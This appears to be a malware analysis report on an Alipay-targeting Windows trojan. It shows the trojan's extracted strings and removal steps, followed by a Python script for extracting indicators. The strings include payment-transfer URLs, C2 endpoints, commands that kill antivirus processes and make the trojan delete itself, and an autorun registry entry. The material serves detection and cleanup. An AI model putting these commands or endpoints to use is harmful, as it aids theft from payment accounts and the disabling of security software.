CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INTEGER)-
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)}
1indexMultiCorePatternUrl_client_id_indexMultiCorePatternUrl
CREATE INDEX MultiCorePatternUrl_client_id_index ON MultiCorePatternUrl(client_id)
hXXp://mse.sogou.com/app/features/feichuan.html/
hXXps://consumeprod.alipay.com/record/standard.htm/
hXXps://consumeprod.alipay.com/record/index.htm/
Software\Tencent\QQBrowser\Advanced\EnableChromeTab
alipay_jmp.txt
Software\Classes\360seURL\Application\ApplicationIcon
Software\Microsoft\Windows\CurrentVersion\Uninstall\360Chrome\DisplayIcon
hXXps://shenghuo.alipay.com/transfercore/validateTransferSuperBankFlow.json
hXXps://shenghuo.alipay.com/transfercore/fill.htm
hXXps://omeo.alipay.com/service/checkcode?sessionID=
SESSIONkEY
-12027,TEAKEY
&payChannel=0100&supportTime=
hXXps://shenghuo.alipay.com/transfercore/confirmSuperNet.htm
supportTime
passConfirmCheck
:yhk_error03.html-----------------------------
c:\yhkerror03.html
&passConfirmCheck=
&supportTime=
hXXps://shenghuo.alipay.com/transfercore/fillAction.htm
payment/cashier.htm?orderId=
yhk_error02.html
:yhk_error02.html-----------------------------
hXXps://lab.alipay.com/consume/record/inpour.htm
hXXps://financeprod.alipay.com/fund/asset.htm
[email protected]
yhk_error01.html
:yhk_error01.html
yhkok.html
[yhkok.html]
yhk_error03.html
hXXps://shenghuo.alipay.com/send/payment/fill.htm
&title=תÕË&memo=&smsNo=
hXXps://shenghuo.alipay.com/send/payment/submit.htm
pageAbsUrl:"hXXp://shenghuo.alipay.com/send/confirm.htm?orderId=
hXXps://shenghuo.alipay.com/send/confirm.htm
dingdan.html
:dingdan.html
zfb_ssid_error01.html
zfb_ssid_error01.html
yhdd.html
hXXps://cashierzth.alipay.com/standard/payment/bankCardForm.htm
.htm?outBizNo=
hXXps://cashierzth.alipay.com/standard/gateway/ebankPay.htm?outBizNo=
alipay_yhzf_error01.txt
:alipay_yhzf_error01.txt
function time(){return new Date().getTime()}hXXps://authztg.alipay.com/login/homeB.htm
password_input
password
J-login-btn
personalweb.alipay.com
:login_error01.txt
login_error01.txt
Y@hXXps://consumeprod.alipay.com/record/standard.htm
hXXps://consumeprod.alipay.com/record/delete.json?record=
alipay.com
cashier.htm
zfb_error01.txt
:zfb_error01.txt
payment/cashier.htm
error.htm
:zfb_error02.txt
zfb_error02.txt
tcresult.htm
ebitexpresspay.htm
waitresult.htm
payresult.htm
:zf_error01.txt
zf_error01.txt
:zf_error02.txt
zf_error02.txt
c:\1242421.txt
hXXp://
hXXps://
hXXps://yebprod.alipay.com/yeb/quickRedeemApply.htm
:yeb_error01.txt
yeb_error01.txt
quickRedeemResult.htm
url!!
quickRedeemApply.htm
:yeb_error02.txt
yeb_error02.txt
hXXps://personalportal.alipay.com/portal/account/index.htm
hXXps://zht.alipay.com/asset/assetStatistics.json?_input_charset=utf-8&categoryType=FASTPAYSERVICE&t=
hXXps://shenghuo.alipay.com/transfer/deposit/depositPreprocessGw.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositCardForm.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositAmountValidate.json
hXXps://cashierzui.alipay.com/standard/gateway/ebankDeposit.json
url":"
,URL:
hXXps://shenghuo.alipay.com/transfer/ac/acFill.htm
function document.onkeydown()
if ( event.keyCode==9)
event.keyCode = 0;
event.cancelBubble = true;
s_sc.php?mac=
test.txt
s_start.php?mac=
&ping 127.0.0.1 -n 2&del /q "
cmd /c taskkill /F /IM
s_submitqq.php?mac=
360sd.exe
360safe.exe
s_sendsd.php?mac=
\svchost.exe
@>c:\cmd.txt
cmd /c
c:\cmd.txt
shell/setshell.php
s_subitqq.php?mac=
@/desk/desk_get.php
s_getbox.php?mac=
/file/sendfile.php?mac=
update/check.php?check=1.3
\update.exe
[email protected]
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
WinExec
GetKeyState
GetViewportOrgEx
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
ShellExecuteA
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.0
HTTP/1.1
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %srmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
PADDINGXXPADDING (linker padding bytes, repeated; run shortened here)
UUWiseHelper.dll
>0123456789ABCDEF deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
iphlpapi.dll
MPR.dll
VERSION.dll
RASAPI32.dll
GetWindowsDirectoryA
ExitWindowsEx
RegCreateKeyA
RegOpenKeyA
oledlg.dll
WSOCK32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
%x.tmp
icmp.dll
(*.htm;*.html)|*.htm;*.html
VVV.dywt.com.cn
%s\%s.lnk
Software\Microsoft\Windows\CurrentVersion\Run
X-X-X-X-X-X
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
1.0.6
\shell32.dll
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
NULL row buffer for row %ld, pass %d
libpng error: %s
libpng warning: %s
Unknown zTXt compression type %d
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
%s: Cannot open
%s: Write error at scanline %lu
%s: Seek error at scanline %lu
%u: Sample out of range, max %u
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%f: Bad value for "%s"
%s: Invalid %stag "%s" (not supported by codec)
TIFFVSetField ... pass by value not imp.
%ld: Bad value for "%s"
%d: Bad value for "%s"
Nonstandard tile length %d, convert file
Nonstandard tile width %d, convert file
Bad value %ld for "%s" tag ignored
%s: Invalid InkNames value; expecting %d names, found %d
TIFFVGetField ... pass by value not imp.
Sorry, can not handle images with %d-bit samples
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, LogL data must have %s=%d
Sorry, can not handle separated image with %s=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle YCbCr images with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Missing needed %s tag
Sorry, can not image with %d-bit samples
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Sample %d out of range, max %u
Internal error, unknown tag 0x%x
Tag %d
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: Data buffer too small to hold tile %ld
%s: No space for data buffer at scanline %ld
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
%s %s encoding is no longer implemented due to Unisys patent enforcement
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
Compression algorithm does not support random access
Bogus "%s" field, ignoring and calculating from imagelength
TIFF directory is missing required "%s" field, calculating from imagelength
wrong data type %d for "%s"; tag ignored
unknown field with tag %d (0x%x) encountered
No space %s
TIFF directory is missing required "%s" field
incorrect count for field "%s" (%lu, expecting %lu); tag ignored
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %lu)
Cannot handle different per-sample values for field "%s"
cannot read TIFF_ANY type %d for field "%s"
"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Error writing data for field "%s"
%s: Error writing SubIFD directory link
%s compression support is not configured
?%s: No space for LogLuv state block
Inappropriate photometric interpretation %d for SGILog compression; %s
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for state block
%s: Bad code word at scanline %d (x %lu)
%s: %s at scanline %d (got %lu, expected %lu)
%s: Premature EOF at scanline %d (x %lu)
%s: No space for Group 3/4 reference line
%s: No space for Group 3/4 run arrays
%s: Uncompressed data (not supported) at scanline %d (x %lu)
Fax SubAddress: %s
(%u = 0x%x)
%suncompressed data
%sEOL padding
%s2-d encoding
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d,decompressor will try reading with sampling %d,%d
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
PackBitsDecode: discarding %d bytes to avoid buffer overrun
LZWDecode: Not enough data at scanline %d (short %d bytes)
LZWDecode: Strip %d not terminated with EOI code
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %d bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
"Predictor" value %d not supported
%u (0x%x)
.PAVCOleException@@
.PAVCOleDispatchException@@
c:\%original file name%.exe
CCaptchaRecognizer::recognizeByCodeTypeAndUrl
hXXp://s1.uudati.com:
hXXp://s1.taskok.com:
hXXp://s1.uudama.com:
hXXp://s1.uuwise.com:
/Api/config.aspx
2.0.0.4
WiseClientAPI-2.0.0.4
CCaptchaRecognizer::__UpdateTKEY
CCaptchaRecognizer::_IsNeedLogin
/Api/DecodeImg.aspx
xxxxxxxxxxx
hXXp://p1.uuwise.net:
hXXp://p1.uudama.net:
hXXp://p1.taskok.com:
hXXp://p1.uuwise.com:
hXXp://p1.uudama.com:
CCaptchaRecognizer::easyRecognizeUrl
%d%d%d%d%d
CCaptchaRecognizer::_CalcRandomPort
/Api/VerifyAPIFile.aspx
/Api/UserLogin.aspx
CCaptchaRecognizer::login
/Api/UserReg.aspx
/Api/PayCard.aspx
/Api/ReportError.aspx
CCaptchaRecognizer::reportError
/Api/UserPoint.aspx
|2.0.0.4|
/Api/DecodeResult.aspx
ID/KEY/
ByTypeBytes.JPG
%d-%d-%d
CHttpRequestHelper::_ReadResponse
User-Agent:WiseClient-2.0.0.4;
WiseClient-2.0.0.4
CHttpRequestHelper::_InternalRequest
CHttpRequestHelper::RequestGetImage
CHttpRequestHelper::RequestPost
ServerPort
UUExtConfig.ini
-:-:-.%d
tCRYPTDLL.DLL
3.cn.pool.ntp.org
2.cn.pool.ntp.org
1.cn.pool.ntp.org
0.cn.pool.ntp.org
cn.pool.ntp.org
\\.\PHYSICALDRIVE0
Microsoft Windows Millennium Edition
Microsoft Windows 98
Microsoft Windows 95
%s (Build %d)
Service Pack 6a (Build %d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Web Edition
Service Pack %d (Build %d)
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003,
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 "R2"
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
ox-x-x-x-x-x
\Tencent\Users\*.*
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
!"#$%&'()* ,-.
uuwise.com
2, 0, 0, 4
1.0.0.1
123456789
(*.*)
1.0.0.0
(hXXp://VVV.eyuyan.com)
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:348
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\My Documents\alipay_jmp.txt (135 bytes)
C:\UUWiseHelper.dll (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"alipay" = "c:\%original file name%.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
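The strings listing above and the removal steps that follow it can be turned into machine-checkable indicators for proxy, DNS and registry hunting. The Python below is an added example, not part of the Lavasoft report and not code from the sample itself. It assumes the listing's defanging conventions (hXXp:// for http://, VVV. for www.), a small allowlist of top-level domains for bare hostnames that you would extend for your environment, and a Windows XP-era mapping for the %Documents and Settings% and %current user% placeholders used in the file list; the sample input is a constructed subset of the lines printed above.

```python
"""
Triage helpers for a strings listing like the one above.  Added example, not
part of the Lavasoft report or of the sample's own code.
"""
import re
from urllib.parse import urlparse

# Constructed subset of the listing above, copied in the form it is printed
# there (defanged hXXp:// and VVV. included).  Not the full dump.
SAMPLE_LISTING = r"""
hXXp://s1.uuwise.com:
/Api/DecodeImg.aspx
VVV.dywt.com.cn
uuwise.com
(hXXp://VVV.eyuyan.com)
3.cn.pool.ntp.org
\\192.168.0.129\TCP\1037
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"alipay" = "c:\%original file name%.exe"
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
C:\UUWiseHelper.dll
"""

# Assumption: a bare token such as "uuwise.com" is only treated as a hostname
# when its last label is in this set, which keeps file names like
# UUWiseHelper.dll or config.aspx out of the host list.  Hosts found inside a
# URL are accepted regardless of TLD.
BARE_HOST_TLDS = {"com", "cn", "net", "org"}

_URL_RE = re.compile(r"hXXps?://[^\s()\"']+", re.IGNORECASE)
_HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?P<tld>[a-z]{2,})\b", re.IGNORECASE)
_IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_UNC_RE = re.compile(r"\\\\[\w.$-]+(?:\\[\w.$-]+)+")          # \\server\share or \\.\device
_RUN_KEY_RE = re.compile(
    r"(?:HK[A-Z_]+\\)?Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?",
    re.IGNORECASE)
_RUN_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"\s*=\s*"(?P<data>[^"]*)"\s*$')
_UA_RE = re.compile(r"User-Agent:\s*(.+?)\s*$")


def refang(s: str) -> str:
    """Undo the listing's defanging: hXXp(s):// -> http(s)://, VVV. -> www., [.] -> ."""
    s = re.sub(r"hXXp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    s = re.sub(r"(^|://)VVV\.", r"\1www.", s)
    return s.replace("[.]", ".")


def _valid_ipv4(s: str) -> bool:
    return all(0 <= int(octet) <= 255 for octet in s.split("."))


def extract_iocs(listing: str) -> dict:
    """Return sets of refanged URLs, hostnames, IPv4s, UNC paths, Run keys/values and UAs."""
    iocs = {k: set() for k in ("urls", "hosts", "ipv4", "unc_paths",
                               "registry_run_keys", "run_values", "user_agents")}
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        for m in _URL_RE.findall(line):
            # The listing prints "host:" with the port elided; drop the dangling colon.
            url = refang(m.rstrip(":"))
            iocs["urls"].add(url)
            host = urlparse(url).hostname
            if host:
                iocs["hosts"].add(host)
        clean = refang(line)
        for m in _HOST_RE.finditer(clean):
            if m.group("tld").lower() in BARE_HOST_TLDS:
                iocs["hosts"].add(m.group(0).lower())
        iocs["ipv4"].update(ip for ip in _IPV4_RE.findall(clean) if _valid_ipv4(ip))
        iocs["unc_paths"].update(_UNC_RE.findall(clean))
        iocs["registry_run_keys"].update(_RUN_KEY_RE.findall(clean))
        rv = _RUN_VALUE_RE.match(clean)
        if rv:
            iocs["run_values"].add((rv.group("name"), rv.group("data")))
        ua = _UA_RE.search(clean)
        if ua:
            iocs["user_agents"].add(ua.group(1))
    return iocs


def expand_placeholders(path: str, current_user: str, original_file_name: str) -> str:
    """Assumed mapping of the report's placeholders onto the XP layout it was run on."""
    return (path.replace("%Documents and Settings%", r"C:\Documents and Settings")
                .replace("%current user%", current_user)
                .replace("%original file name%", original_file_name))


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_LISTING).items():
        for value in sorted(values, key=str):
            print(f"{kind:18} {value}")
```

Feed the full listing in place of SAMPLE_LISTING to get the complete set; the `run_values` entries map directly onto the autorun value named in the removal steps, and `expand_placeholders` turns the report's file paths into ones a host check can test for.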